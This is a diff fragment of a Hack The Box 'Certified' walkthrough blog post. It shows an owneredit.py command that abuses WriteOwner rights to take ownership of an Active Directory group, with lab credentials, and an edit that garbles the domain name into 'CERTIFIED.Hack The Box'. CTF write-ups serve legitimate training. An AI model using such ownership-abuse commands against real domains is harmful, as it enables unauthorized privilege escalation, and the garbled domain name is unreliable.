Emp5r0R/Secure-The-Throne/content/posts/1742035934336-Certified-Walkthrough(HTB)/index.md

 sudo rdate -n certified.htb
 ```
 #### WriteOwner Abuse
-- First we need to be an user of `MANAGEMENT@CERTIFIED.HTB`
+- First we need to be an user of `MANAGEMENT@CERTIFIED.Hack The Box`
 - Using this command, I can change the ownership of the object to the user which I own
 ```bash
 owneredit.py -action write -new-owner 'judith.mader' -target 'Management' 'certified.htb/judith.mader:judith09'